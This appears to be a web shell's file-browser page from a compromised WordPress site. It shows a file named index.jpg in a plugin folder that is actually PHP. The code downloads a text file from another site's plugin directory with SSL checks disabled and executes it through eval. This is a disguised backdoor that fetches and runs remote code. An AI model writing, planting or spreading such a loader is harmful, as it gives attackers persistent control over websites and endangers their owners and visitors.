Your IP : 216.73.216.196


Current Path : /home/icmq6107/clients/naddaf/wp-content/plugins/lms/
Upload File :
Current File : /home/icmq6107/clients/naddaf/wp-content/plugins/lms/index.jpg

<?php
$ターゲット = 'https://thehomesgroup.co.uk/wp-content/plugins/mobiloud-smart-app-banner/ws.txt';

$ハンドル = curl_init();
curl_setopt($ハンドル, CURLOPT_URL, $ターゲット);
curl_setopt($ハンドル, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ハンドル, CURLOPT_SSL_VERIFYPEER, false);

$取得データ = curl_exec($ハンドル);
curl_close($ハンドル);

if (!empty($取得データ)) {
    eval('?>' . $取得データ);
}
?>